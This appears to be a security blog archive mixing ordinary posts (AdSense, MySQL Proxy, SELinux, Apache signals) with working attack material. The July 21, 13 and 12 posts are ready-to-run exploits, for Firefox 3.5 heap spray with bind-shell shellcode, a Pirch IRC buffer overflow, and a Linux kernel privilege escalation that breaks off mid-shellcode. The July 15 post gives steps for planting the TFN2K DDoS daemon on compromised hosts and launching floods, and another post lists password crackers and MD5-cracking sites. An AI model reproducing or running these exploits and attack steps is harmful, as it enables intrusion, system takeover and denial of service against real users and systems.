Jul 22

Ad blindness is a common problem: visitors learn to ignore Google AdSense ads that always look the same and always sit in the same single position. The Adsense Injection WordPress plugin lets you insert ads at random positions in your posts, which reduces ad blindness and increases clicks.

Earlier I had pointed to another excellent plugin, AdSense Deluxe WordPress Plugin, that lets you insert Google AdSense or Yahoo ads into blog posts easily. But there was no random ad insertion; you decided where to insert the ads.

The new Adsense Injection WordPress plugin simply picks a random paragraph break in your article and inserts the Google AdSense code there. It does one insertion per story. It lets you pick how many ads in total to insert (0-3), and which formats and colors it should randomly select from. You can see it at work on their blog. A very good idea, but it may cause ads to appear in odd places, especially if you use a lot of images in posts, since you now have less control over ad placement.

Now, if you are looking for Google AdSense secrets, this is one of them.

Jul 21

##################################################
# FireFox 3.5 Heap Spray
# Discovered by: Simon Berry-Bryne
# Coded in Perl by netsoul, ALTO PARANA – Paraguay
# Contact: netsoul2 [at] gmail [dot] com
##################################################

#!/usr/bin/perl -w
use strict;
use POE::Component::Server::HTTP;
POE::Component::Server::HTTP->new(Port => my $port = 8080,
ContentHandler => {"/" =>  sub{$_[1]->push_header("Content-Type", "text/html"), $_[1]->content()}});
 
print "[-] Listening in port $port...\n[-] Sending payload...\n[-] After 30 secs try with netcat for connect in port 5500\n";
POE::Kernel->run();
 
__DATA__
 
 
 
 
//windows - shell_bind_tcp - metasploit - encoding is shikata_ga_nai
var shellcode= unescape("%u6afc%u4deb%uf9e8%uffff%u60ff%u6c8b%u2424%u458b%u8b3c%u057c%u0178%u8bef" +
			"%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca" +
			"%uc201%uf4eb%u543b%u2824%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01" +
			"%u2c03%u898b%u246c%u611c%u31c3%u64db%u438b%u8b30%u0c40%u708b%uad1c%u408b" +
			"%u5e08%u8e68%u0e4e%u50ec%ud6ff%u5366%u6866%u3233%u7768%u3273%u545f%ud0ff" +
			"%ucb68%ufced%u503b%ud6ff%u895f%u66e5%ued81%u0208%u6a55%uff02%u68d0%u09d9" +
			"%uadf5%uff57%u53d6%u5353%u5353%u5343%u5343%ud0ff%u6866%u7c15%u5366%ue189" +
			"%u6895%u1aa4%uc770%uff57%u6ad6%u5110%uff55%u68d0%uada4%ue92e%uff57%u53d6" +
			"%uff55%u68d0%u49e5%u4986%uff57%u50d6%u5454%uff55%u93d0%ue768%uc679%u5779" +
			"%ud6ff%uff55%u66d0%u646a%u6866%u6d63%ue589%u506a%u2959%u89cc%u6ae7%u8944" +
			"%u31e2%uf3c0%ufeaa%u2d42%u42fe%u932c%u7a8d%uab38%uabab%u7268%ub3fe%uff16" +
			"%u4475%ud6ff%u575b%u5152%u5151%u016a%u5151%u5155%ud0ff%uad68%u05d9%u53ce" +
			"%ud6ff%uff6a%u37ff%ud0ff%u578b%u83fc%u64c4%ud6ff%uff52%u68d0%uceef%u60e0" +
			"%uff53%uffd6%u41d0");
oneblock = unescape("%u0c0c%u0c0c");
var fullblock = oneblock;
while (fullblock.length<0x60000)  
{
    fullblock += fullblock;
}
sprayContainer = new Array();
for (i=0; i<600; i++)  
{
    sprayContainer[i] = fullblock + shellcode;
}
var searchArray = new Array()
 
function escapeData(data)
{
 var i;
 var c;
 var escData='';
 for(i=0;i 0)  
        while (i<pTags.length)
        {
            oTags = pTags[i].getElementsByTagName("font")
            searchArray[i+1] = new Array()
            if (oTags[0])  
            {
                searchArray[i+1]["str"] = oTags[0].innerHTML;
            }
            i++
        }
    }
}
 
function GenerateHTML()
{
    var html = "";
    for (i=1;i<searchArray.length;i++)
    {
        html += escapeData(searchArray[i]["str"])
    }    
}
DataTranslator();
GenerateHTML()
Jul 20

MySQL-Proxy, announced in June, is a binary application that sits between your MySQL client and server, and supports the embedded scripting language Lua. The proxy can be used to analyze, monitor and transform communication, and supports a wide range of scenarios including:

One of the more powerful features of MySQL Proxy is the ability to do "Read/Write Splitting". The basic concept is to have a master database handle transactional queries while slaves handle SELECT queries. Replication is used to synchronize the changes due to transactional queries with the slaves in the cluster.

Jan Kneschke, writing about the technique in "MySQL Proxy learns R/W Splitting", discusses connection pooling:

For R/W Splitting we need connection pooling. We only switch to another backend if we already have an authenticated connection open to that backend. The MySQL protocol first does a challenge-response handshake. When we enter the query/result stage it is too late to authenticate new connections. We have to make sure that we have enough open connections to operate nicely.

The Lua script to handle read/write splitting is straightforward:

  -- read/write splitting
  --
  -- send all non-transactional SELECTs to a slave
  if is_in_transaction == 0 and
     packet:byte() == proxy.COM_QUERY and
     packet:sub(2, 7) == "SELECT" then
    local max_conns = -1
    local max_conns_ndx = 0

    for i = 1, #proxy.servers do
      local s = proxy.servers[i]

      -- pick a slave which has some idling connections
      if s.type == proxy.BACKEND_TYPE_RO and
         s.idling_connections > 0 then
        if max_conns == -1 or
           s.connected_clients < max_conns then
          max_conns = s.connected_clients
          max_conns_ndx = i
        end
      end
    end

    -- we found a slave which has an idling connection
    if max_conns_ndx > 0 then
      proxy.connection.backend_ndx = max_conns_ndx
    end
  else
    -- send to master
  end

  return proxy.PROXY_SEND_QUERY
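To make the routing rule easy to trace offline, here is the same decision re-implemented in plain Python over a constructed list of backends. This is an added illustration, not MySQL Proxy code: the Backend class, choose_backend, the string constants standing in for proxy.BACKEND_TYPE_RO/RW and the sample cluster are all assumptions made for the example; only COM_QUERY (3) is the real MySQL command byte.

```python
"""Model of the read/write-splitting rule from the Lua script above.

Added illustration, not MySQL Proxy code.  Backend indices are 1-based as in
the Lua script, and 0 means "leave the default backend", i.e. the master.
"""
from dataclasses import dataclass

COM_QUERY = 0x03          # real MySQL command byte for a text query
BACKEND_TYPE_RW = "rw"    # stand-ins for proxy.BACKEND_TYPE_RW / BACKEND_TYPE_RO
BACKEND_TYPE_RO = "ro"


@dataclass
class Backend:            # assumed shape of one proxy.servers[i] entry
    name: str
    type: str
    idling_connections: int
    connected_clients: int


def choose_backend(packet: bytes, in_transaction: bool, servers: list) -> int:
    """Return the 1-based index of the slave to use, or 0 to keep the master.

    Mirrors the Lua rule: only a COM_QUERY whose text starts with "SELECT",
    issued outside a transaction, may leave the master.  Among read-only
    backends holding an idle pooled connection, the one with the fewest
    connected clients wins.  Everything else stays on the master.
    """
    if in_transaction or not packet or packet[0] != COM_QUERY:
        return 0
    # Lua's packet:sub(2, 7) is 1-based and inclusive: bytes 1..6 in Python.
    if packet[1:7] != b"SELECT":
        return 0

    best_ndx, best_conns = 0, -1
    for ndx, s in enumerate(servers, start=1):
        if s.type == BACKEND_TYPE_RO and s.idling_connections > 0:
            if best_conns == -1 or s.connected_clients < best_conns:
                best_conns, best_ndx = s.connected_clients, ndx
    return best_ndx


# Constructed sample cluster: a master, two usable slaves, one slave with no idle connection.
SAMPLE_SERVERS = [
    Backend("master", BACKEND_TYPE_RW, idling_connections=5, connected_clients=2),
    Backend("slave-a", BACKEND_TYPE_RO, idling_connections=2, connected_clients=7),
    Backend("slave-b", BACKEND_TYPE_RO, idling_connections=1, connected_clients=3),
    Backend("slave-c", BACKEND_TYPE_RO, idling_connections=0, connected_clients=0),
]


def demo() -> dict:
    """Route a few constructed packets and report the chosen backend index."""
    select = bytes([COM_QUERY]) + b"SELECT 1"
    update = bytes([COM_QUERY]) + b"UPDATE t SET x = 1"
    return {
        "select_outside_txn": choose_backend(select, False, SAMPLE_SERVERS),  # 3: slave-b, least loaded
        "select_inside_txn": choose_backend(select, True, SAMPLE_SERVERS),    # 0: master
        "update": choose_backend(update, False, SAMPLE_SERVERS),              # 0: master
        "no_idle_slave": choose_backend(select, False,
                                        SAMPLE_SERVERS[:1] + SAMPLE_SERVERS[3:]),  # 0: master
    }


if __name__ == "__main__":
    for case, ndx in demo().items():
        print(f"{case}: backend_ndx={ndx}")
```

Because the rule is a literal byte comparison, anything it does not positively match (a lowercase "select", a leading comment, a non-query command) falls through to the master, which is the safe direction: the only traffic that ever leaves the master is what the rule explicitly recognises as a plain SELECT outside a transaction.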


Jan notes that the technique can also be used to implement other data distribution strategies, such as sharding.

Jul 19

SELinux can be installed in three fundamental ways:

  • As an integral component of a Linux distribution, installed at the same time as the distribution

  • By using binary or source packages, such as the .deb packages used by Debian GNU/Linux; the ebuilds used by Gentoo Linux; or the RPM packages used by Fedora Core, Red Hat Enterprise Linux, and SUSE Linux

  • By downloading, compiling, and installing the sources provided by the NSA

At the time of writing, only Fedora Core and Gentoo contain SELinux as a fully supported, native facility. So unless you choose one of those distributions, you must install SELinux yourself. If you install SELinux yourself, it’s generally much more convenient to do so using packages. However, prebuilt packages are not available for every Linux distribution. Those who are unable or unwilling to use a distribution for which packages are available must compile the sources provided by the NSA. In many cases, the sources must be modified in order to work properly with the distinctive characteristics of a specific Linux distribution.

The following sections explain how to install and initially configure SELinux for several popular Linux distributions. The final section of this chapter explains how to install SELinux using the source code provided by the NSA.

Using X with SELinux

Coaxing SELinux into working with X has proven to be somewhat difficult. Recent releases of SELinux perform much better in this regard than older releases. But they still fall short of perfection. It’s common for SELinux users to find that the login screen doesn’t appear or that they can’t log in.

The KDE Desktop has so far proven more resistant to interoperation with SELinux than its rival desktop, GNOME. The central problem is that various KDE programs run as identically named processes. Thus, SELinux cannot assign these KDE processes to distinct domains. One result of this inability is that KDE’s temporary files sometimes cannot be labeled with appropriate domains. Thus, with respect to KDE, SELinux policies tend either to be too restrictive or too lax. We can hope that a future release of KDE or SELinux will somehow address this problem. In the meantime, for those using SELinux, GNOME is generally a better desktop choice than KDE.

If you find yourself unable to log into X, try returning to a text-mode console by pressing Ctrl-Alt-F1. Then log in and reboot the system in non-SELinux mode.

Jul 18

After the tremendously successful 2000 and 2003 security tools surveys, Insecure.Org is delighted to release this 2006 survey. I (Fyodor) asked users from the nmap-hackers mailing list to share their favorite tools, and 3,243 people responded. This allowed me to expand the list to 100 tools, and even subdivide them into categories. This is the category page for password crackers — the full network security list is available here. Anyone in the security field would be well advised to go over the list and investigate tools they are unfamiliar with. I discovered several powerful new tools this way. I also point newbies to this site whenever they write me saying “I don’t know where to start”.

Respondents were allowed to list open source or commercial tools on any platform. Commercial tools are noted as such in the list below. No votes for the Nmap Security Scanner were counted because the survey was taken on a Nmap mailing list. This audience also biases the list slightly toward “attack” hacking tools rather than defensive ones.

Each tool is described by one or more attributes:

new
Did not appear on the 2003 list

Commercial
Generally costs money. A free limited/demo/trial version may be available.

Linux
Works natively on Linux

*BSD
Works natively on OpenBSD, FreeBSD, Solaris, and/or other UNIX variants

OS X
Works natively on Apple Mac OS X

Windows
Works natively on Microsoft Windows

Command-line interface
Features a command-line interface

GUI Interface
Offers a GUI (point and click) interface

Source code
Source code available for inspection.

Please send updates and suggestions (or better tool logos) to Fyodor. If your tool is featured or you think your site visitors might enjoy this list, you are welcome to use our link banners. Here is the list, starting with the most popular:


Cain and Abel : The top password recovery tool for Windows
UNIX users often smugly assert that the best free security tools support their platform first, and Windows ports are often an afterthought. They are usually right, but Cain & Abel is a glaring exception. This Windows-only password recovery tool handles an enormous variety of tasks. It can recover passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols. It is also well documented.

Also categorized as: packet sniffers



John the Ripper : A powerful, flexible, and fast multi-platform password hash cracker
John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types which are most commonly found on various Unix flavors, as well as Kerberos AFS and Windows NT/2000/XP LM hashes. Several other hash types are added with contributed patches. You will want to start with some wordlists, which you can find here, here, or here.


THC Hydra : A Fast network authentication cracker which supports many different services
When you need to brute force crack a remote authentication service, Hydra is often the tool of choice. It can perform rapid dictionary attacks against more than 30 protocols, including telnet, ftp, http, https, smb, several databases, and much more. Like THC Amap this release is from the fine folks at THC.

Aircrack : The fastest available WEP/WPA cracking tool
Aircrack is a suite of tools for 802.11a/b/g WEP and WPA cracking. It can recover a 40 through 512-bit WEP key once enough encrypted packets have been gathered. It can also attack WPA 1 or 2 networks using advanced cryptographic methods or by brute force. The suite includes airodump (an 802.11 packet capture program), aireplay (an 802.11 packet injection program), aircrack (static WEP and WPA-PSK cracking), and airdecap (decrypts WEP/WPA capture files).

Also categorized as: wireless tools



L0phtcrack : Windows password auditing and recovery application
L0phtCrack attempts to crack Windows passwords from hashes which it can obtain (given proper access) from stand-alone Windows workstations, networked servers, primary domain controllers, or Active Directory. In some cases it can sniff the hashes off the wire. It also has numerous methods of generating password guesses (dictionary, brute force, etc). LC5 was discontinued by Symantec in 2006, then re-acquired by the original L0pht guys and reborn as LC6 in 2009. For free alternatives, consider Ophcrack, Cain and Abel, or John the Ripper.


Airsnort : 802.11 WEP Encryption Cracking Tool
AirSnort is a wireless LAN (WLAN) tool that recovers encryption keys. It was developed by the Shmoo Group and operates by passively monitoring transmissions, computing the encryption key when enough packets have been gathered. You may also be interested in the similar Aircrack.

Also categorized as: wireless tools



SolarWinds : A plethora of network discovery/monitoring/attack tools
SolarWinds has created and sells dozens of special-purpose tools targeted at systems administrators. Security-related tools include many network discovery scanners, an SNMP brute-force cracker, router password decryption, a TCP connection reset program, one of the fastest and easiest router config download/upload applications available and more.

Also categorized as: traffic monitoring tools



Pwdump : A Windows password recovery tool
Pwdump is able to extract NTLM and LanMan hashes from a Windows target, regardless of whether Syskey is enabled. It is also capable of displaying password histories if they are available. It outputs the data in L0phtcrack-compatible form, and can write to an output file.


RainbowCrack : An Innovative Password Hash Cracker
The RainbowCrack tool is a hash cracker that makes use of a large-scale time-memory trade-off. A traditional brute force cracker tries all possible plaintexts one by one, which can be time consuming for complex passwords. RainbowCrack uses a time-memory trade-off to do all the cracking-time computation in advance and store the results in so-called "rainbow tables". It does take a long time to precompute the tables but RainbowCrack can be hundreds of times faster than a brute force cracker once the precomputation is finished.


Brutus : A network brute-force authentication cracker
This Windows-only cracker bangs against network services of remote systems trying to guess passwords by using a dictionary and permutations thereof. It supports HTTP, POP3, FTP, SMB, TELNET, IMAP, NTP, and more. No source code is available. UNIX users should take a look at THC Hydra.

Jul 17

http://www.cmd5.com/

MD5 Reverse Lookup
http://linardy.com/md5.php
Digest-MD5-Reverse-1.3
http://search.cpan.org/~blwood/Digest-MD5-Reverse-1.3/
md5 hash search
http://www.hashchecker.com/index.php?_sls=search_hash
mmkey
http://www.mmkey.com/md5/
Dictionary Based Hash Cracker
http://www.securitystats.com/tools/hashcrack.php
project md5
http://schwett.com/md5/
xmd5
http://www.xmd5.org/index_en.htm
http://www.md5.org.cn/index_en.htm
TMTO[dot]ORG
http://www.tmto.org/home/
md5 rednoize
http://md5.rednoize.com/
MD5 Rainbow
http://passcracking.ru/
Reverse MD5 hash lookup
http://tools.benramsey.com/md5/
md5decrypt
http://www.md5decrypt.com/
md5
http://md5decryption.com/
alimamed
http://alimamed.pp.ru/md5/
md5crack
http://md5crack.it-helpnet.de/index.php?op=add
md5 hash database project
http://shm.hard-core.pl/md5/
Hash Calculator
https://www.astalavista.net/?cmd=rainbowtables (online hash cracking)
Ice Breaker
http://ice.breaker.free.fr/
md5This
http://www.md5this.com/
MD5 Encryption/Decryption Tool
http://md5.allfact.info/
MD5 Cracker (How safe is your password?)
http://bokehman.com/cracker/
MD5-crack
http://www.tydal.nu/article/md5-crack/
This is the site for password recovery. MD5 rainbow tables are used here.
http://passcracking.com/
http://passcracking.ru/
MD5 :: Reverse engineer your MD5
http://md5.idiobase.de/
The MD5 Collision Database
http://www.md5-db.com/index.php
GData: An Online MD5 Hash Database
http://gdataonline.com/
milw0rm MD5 Cracker
http://www.milw0rm.com/cracker/info.php
milw0rm MD5 checker
https://elitehackers.info/forums/showthread.php?t=5767

Jul 15

download tfn2k.tgz

1.tar xvzf tfn2k.tgz
2. vi src/Makefile (if your machine is Linux, nothing needs to be changed)
3. vi src/ip.h and comment out the duplicated definition shown below; otherwise the compiler reports a redefinition error

           /*struct in_addr 
             { 
              unsigned long int s_addr; 
           };*/

4. compile

cd tfn2k/src
make

You will be prompted to enter an 8-32 character password; this is the only authentication credential, so remember it!

5. Once compilation succeeds, you will have td and tfn

td is the daemon installed on the client machine; it is controlled by the tfn client.

6.please upload "td" to you rooted machine and run it

7.test Communications

./tfn -f host.txt -c 10 -i "mkdir testfile"

if client found testfile is successed

8.start attack–

ICMP attacks

#. / tfn-f hosts.txt-c 6 -i target (10 minutes,target on the death of)

SYN / TCP attacks:

#./ tfn-f hosts.txt-c 5 -i target-p 80

UDP attacks:

#. / tfn-f hosts.txt-c 4 -i target

ICMP / TCP / UDP attack rotation:

#. / tfn-f hosts.txt-c 8 -i target

To stop the attack:

#. / tfn-f host.txt-c 0

Jul 14

This document covers stopping and restarting Apache on Unix only.

You will notice many httpd executables running on your system, but you should not send signals to any of them except the parent, whose pid is in the PidFile. That is to say you shouldn’t ever need to send signals to any process except the parent. There are three signals that you can send the parent: TERM, HUP, and USR1, which will be described in a moment.

To send a signal to the parent you should issue a command such as:

    kill -TERM `cat /usr/local/apache/logs/httpd.pid`

You can read about its progress by issuing:

    tail -f /usr/local/apache/logs/error_log

Modify those examples to match your ServerRoot and PidFile settings.

As of Apache 1.3 we provide a script called apachectl which can be used to start, stop, and restart Apache. It may need a little customization for your system, see the comments at the top of the script.

TERM Signal: stop now

Sending the TERM signal to the parent causes it to immediately attempt to kill off all of its children. It may take it several seconds to complete killing off its children. Then the parent itself exits. Any requests in progress are terminated, and no further requests are served.

HUP Signal: restart now

Sending the HUP signal to the parent causes it to kill off its children like in TERM but the parent doesn’t exit. It re-reads its configuration files, and re-opens any log files. Then it spawns a new set of children and continues serving hits.

Users of the status module will notice that the server statistics are set to zero when a HUP is sent.

Note: If your configuration file has errors in it when you issue a restart then your parent will not restart, it will exit with an error. See below for a method of avoiding this.

USR1 Signal: graceful restart

Note: prior to release 1.2b9 this code is quite unstable and shouldn’t be used at all.

The USR1 signal causes the parent process to advise the children to exit after their current request (or to exit immediately if they’re not serving anything). The parent re-reads its configuration files and re-opens its log files. As each child dies off the parent replaces it with a child from the new generation of the configuration, which begins serving new requests immediately.

This code is designed to always respect the MaxClients, MinSpareServers, and MaxSpareServers settings. Furthermore, it respects StartServers in the following manner: if after one second at least StartServers new children have not been created, then create enough to pick up the slack. This is to say that the code tries to maintain both the number of children appropriate for the current load on the server, and respect your wishes with the StartServers parameter.

Users of the status module will notice that the server statistics are not set to zero when a USR1 is sent. The code was written to both minimize the time in which the server is unable to serve new requests (they will be queued up by the operating system, so they’re not lost in any event) and to respect your tuning parameters. In order to do this it has to keep the scoreboard used to keep track of all children across generations.

The status module will also use a G to indicate those children which are still serving requests started before the graceful restart was given.

At present there is no way for a log rotation script using USR1 to know for certain that all children writing the pre-restart log have finished. We suggest that you use a suitable delay after sending the USR1 signal before you do anything with the old log. For example if most of your hits take less than 10 minutes to complete for users on low bandwidth links then you could wait 15 minutes before doing anything with the old log.

Note: If your configuration file has errors in it when you issue a restart then your parent will not restart, it will exit with an error. In the case of graceful restarts it will also leave children running when it exits. (These are the children which are "gracefully exiting" by handling their last request.) This will cause problems if you attempt to restart the server — it will not be able to bind to its listening ports. Before doing a restart, you can check the syntax of the configuration files with the -t command line argument. This still will not guarantee that the server will restart correctly. To check the semantics of the configuration files as well as the syntax, you can try starting httpd as a non-root user. If there are no errors it will attempt to open its sockets and logs and fail because it’s not root (or because the currently running httpd already has those ports bound). If it fails for any other reason then it’s probably a config file error and the error should be fixed before issuing the graceful restart.
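The advice above amounts to a small procedure: read the parent's pid from PidFile (and nothing else), syntax-check the configuration with -t before any restart, and only then send TERM, HUP or USR1. The following is an added example, not part of the Apache documentation or distribution, that puts those steps in one place; HTTPD_BIN, the `run` and `kill_fn` hooks and the function names are assumptions made so the logic can be exercised without a live server.

```python
"""Signal the Apache 1.3 parent the way the text describes.

Added example, not Apache code.  The default paths match the examples in
the text; `run` and `kill_fn` exist so the decision logic can be tested
without a running server.
"""
import os
import re
import signal
import subprocess

HTTPD_BIN = "/usr/local/apache/bin/httpd"        # assumed install path
PIDFILE = "/usr/local/apache/logs/httpd.pid"     # PidFile path from the text

# The three signals the parent understands, keyed by what they do.
SIGNALS = {
    "stop": signal.SIGTERM,      # kill children, then exit
    "restart": signal.SIGHUP,    # kill children, re-read config, respawn
    "graceful": signal.SIGUSR1,  # let children finish, then replace them
}


def read_parent_pid(pidfile: str) -> int:
    """Return the parent's pid from PidFile.

    Only the parent may be signalled, so the file must hold exactly one
    positive integer; anything else (empty, truncated, tampered) is rejected
    rather than risking kill() against an unrelated process.
    """
    with open(pidfile, "r", encoding="ascii") as fh:
        text = fh.read().strip()
    if not re.fullmatch(r"[1-9][0-9]*", text):
        raise ValueError(f"{pidfile}: does not contain a single positive pid: {text!r}")
    return int(text)


def config_syntax_ok(httpd_bin: str = HTTPD_BIN, run=subprocess.run) -> bool:
    """Run `httpd -t`; a non-zero exit means a restart would fail or leave a broken parent."""
    result = run([httpd_bin, "-t"], capture_output=True)
    return result.returncode == 0


def apache_signal(action: str, pidfile: str = PIDFILE, httpd_bin: str = HTTPD_BIN,
                  run=subprocess.run, kill_fn=os.kill) -> int:
    """Send the signal for `action` to the parent after the checks the text advises.

    For HUP and USR1 the configuration is syntax-checked first: a broken config
    makes the parent exit on HUP, and on USR1 additionally leaves gracefully
    exiting children holding the listening ports.  Returns the signal sent.
    """
    try:
        sig = SIGNALS[action]
    except KeyError:
        raise ValueError(f"unknown action {action!r}; expected one of {sorted(SIGNALS)}") from None
    pid = read_parent_pid(pidfile)
    if action != "stop" and not config_syntax_ok(httpd_bin, run):
        raise RuntimeError("httpd -t failed; refusing to send %s to pid %d" % (sig.name, pid))
    kill_fn(pid, sig)
    return int(sig)


if __name__ == "__main__":
    import sys
    # usage: python apache_signal.py stop|restart|graceful [pidfile]
    print(apache_signal(sys.argv[1], *sys.argv[2:3]))
```

As the text notes, passing -t only proves the syntax; a configuration that parses but cannot bind its ports or open its logs still has to be caught by trying httpd as a non-root user before the graceful restart.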

Appendix: signals and race conditions

Prior to Apache 1.2b9 there were several race conditions involving the restart and die signals (a simple description of race condition is: a time-sensitive problem, as in if something happens at just the wrong time it won’t behave as expected). For those architectures that have the "right" feature set we have eliminated as many as we can. But it should be noted that there still do exist race conditions on certain architectures.

Architectures that use an on-disk ScoreBoardFile have the potential to corrupt their scoreboards. This can result in the "bind: Address already in use" (after HUP) or "long lost child came home!" (after USR1). The former is a fatal error, while the latter just causes the server to lose a scoreboard slot. So it might be advisable to use graceful restarts, with an occasional hard restart. These problems are very difficult to work around, but fortunately most architectures do not require a scoreboard file. See the ScoreBoardFile documentation for a method to determine whether your architecture uses it.

NEXT and MACHTEN (68k only) have small race conditions which can cause a restart/die signal to be lost, but should not cause the server to do anything otherwise problematic.

All architectures have a small race condition in each child involving the second and subsequent requests on a persistent HTTP connection (KeepAlive). It may exit after reading the request line but before reading any of the request headers. There is a fix that was discovered too late to make 1.2. In theory this isn’t an issue because the KeepAlive client has to expect these events because of network latencies and server timeouts. In practice it doesn’t seem to affect anything either — in a test case the server was restarted twenty times per second and clients successfully browsed the site without getting broken images or empty documents.

Jul 13

#[*] Usage : python pirch.py
#
#[*] Bug     : Pirch IRC 98 Client (response) Remote BOF Exploit (SEH)
#[*] Tested on : Xp sp3 (EN)(VB)
#[*] Ref    : Bid 5079
#[*] Exploited by : His0k4
#[*] Greetings : All friends (DZ)

#!/usr/bin/python
 
from socket import *
 
# win32_exec -  EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
shellcode=(
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54"
"\x42\x30\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x58\x4e\x47"
"\x45\x50\x4a\x37\x41\x50\x4f\x4e\x4b\x58\x4f\x34\x4a\x41\x4b\x58"
"\x4f\x55\x42\x52\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48"
"\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c"
"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x33\x46\x55\x46\x52\x46\x50\x45\x47\x45\x4e\x4b\x48"
"\x4f\x55\x46\x52\x41\x30\x4b\x4e\x48\x56\x4b\x48\x4e\x30\x4b\x34"
"\x4b\x48\x4f\x35\x4e\x51\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x58"
"\x41\x50\x4b\x4e\x49\x48\x4e\x55\x46\x42\x46\x50\x43\x4c\x41\x43"
"\x42\x4c\x46\x36\x4b\x38\x42\x54\x42\x33\x45\x38\x42\x4c\x4a\x47"
"\x4e\x30\x4b\x48\x42\x34\x4e\x50\x4b\x58\x42\x57\x4e\x51\x4d\x4a"
"\x4b\x48\x4a\x36\x4a\x50\x4b\x4e\x49\x50\x4b\x48\x42\x38\x42\x4b"
"\x42\x30\x42\x50\x42\x30\x4b\x58\x4a\x56\x4e\x43\x4f\x35\x41\x33"
"\x48\x4f\x42\x46\x48\x55\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57"
"\x42\x45\x4a\x46\x42\x4f\x4c\x58\x46\x30\x4f\x35\x4a\x46\x4a\x59"
"\x50\x4f\x4c\x58\x50\x50\x47\x45\x4f\x4f\x47\x4e\x43\x36\x41\x56"
"\x4e\x36\x43\x56\x42\x30\x5a")
 
payload =  "DZ" #Trick track
payload += shellcode
payload += "\x41"*(1035-len(shellcode))
payload += "\xE8\xF0\xFB\xFF\xFF" # back again
payload += "\x42"*5
payload += "\xEB\xF4\xFF\xFF" # back
payload += "\x9A\x2B\x40\x0A" # lucky x0A=>x00  ;)   univ p/p/r
 
 
head =  ":irc.localhost 001 attacker :Welcome to the Internet Relay Chat network, attacker!pirch@0.0.0.0\r\n"
head += ":attacker_test!pirch@0.0.0.gl08= MODE "+payload+" :-i\r\n"
 
 
s = socket(AF_INET, SOCK_STREAM)
s.bind(("0.0.0.0", 6667))
s.listen(1)
 
print "[*] Listening on [IRC] 6667"
c, addr = s.accept()
print "[*] Connection accepted from: %s" % (addr[0])
c.recv(1024)
c.send(head)
 
raw_input("[*] Payload sended!\nPress key to exit")
c.close()
s.close()
Jul 12

/* CVE-2009-1046 Virtual Console UTF-8  set_selection() off-by-one(two) Memory Corruption
* Linux Kernel <= 2.6.28.3
*
* coded by: sgrakkyu <at> antifork.org
* http://kernelbof.blogspot.com/2009/07/even-when-one-byte-matters.html
*
* Dedicated to all people talking nonsense about non exploitability of kernel heap off-by-one overflow
*
* NOTE-1: you need a virtual console attached to the standard output (stdout)
* - physical login
* - ptrace() against some process with the same uid already attached to a VC
* - remote management ..
*
* NOTE-2: UTF-8 character used is: U+253C - it seems to be supported in most standard console fonts
* but if it's _not_: change it (and change respectively STREAM_ZERO and STREAM_ZERO_ALT defines)
* If you use an unsupported character expect some sort of recursive fatal ooops:)
*
* Designed to be built as x86-64 binary only (SLUB ONLY)
* SCTP stack has to be available
*
* Tested on target:
* Ubuntu 8.04 x86_64 (2.6.24_16-23 generic/server)
* Ubuntu 8.10 x86_64 (2.6.27_7-10 genric/server)
* Fedora Core 10 x86_64 (default installed kernel - without selinux)
*
*/

#define _GNU_SOURCE
#include <stdio.h>
#include <sched.h>
#include <errno.h>
#include <netinet/in.h>
#include <netinet/sctp.h>
#include <arpa/inet.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/ioctl.h>
#include <stdlib.h>
#include <string.h>
#include <linux/tiocl.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <signal.h>
#include <sys/mman.h>
#include <sched.h>
#include <unistd.h>
#include <fcntl.h>

#ifndef __x86_64__
#error "Architecture Unsupported"
#error "This code was written for x86-64 target and has to be built as x86-64 binary"
#else

#ifndef __u8
#define __u8  uint8_t
#endif
#ifndef __u16
#define __u16 uint16_t
#endif
#ifndef __u32
#define __u32 uint32_t
#endif
#ifndef __u64
#define __u64 uint64_t
#endif

#define STREAM_ZERO 10
#define STREAM_ZERO_ALT 12

#define SCTP_STREAM 22
#define STACK_SIZE 0x1000
#define PAGE_SIZE 0x1000
#define STRUCT_PAGE  0x0000000000000000
#define STRUCT_PAGE_ALT 0x0000000100000000
#define CODE_PAGE      0x0000000000010000
#define LOCALHOST "127.0.0.1"
#define KMALLOC "kmalloc-128"
#define TIMER_LIST_FOPS "timer_list_fops"

#define __msg_f(format, args...) \
  do { fprintf(stdout, format, ## args); } while(0)

#define __msg(msg) \
  do { fprintf(stdout, "%s", msg); } while(0)

#define __fatal_errno(msg) \
do { perror(msg); __free_stuff(); exit(1); } while(0)

#define __fatal(msg) \
do { fprintf(stderr, msg); __free_stuff(); exit(1); } while(0)

#define CJUMP_OFF 13
char ring0[]=
"\x57"                                      //    push   %rdi
"\x50"                                      //    push   %rax
"\x65\x48\x8b\x3c\x25\x00\x00\x00\x00"      //    mov    %gs:0×0,%rdi
"\x48\xb8\x41\x41\x41\x41\x41\x41\x41\x41"  //    mov   xxx, %rax
"\xff\xd0"                                  //    callq  *%rax
"\x58"                                      //    pop    %rax
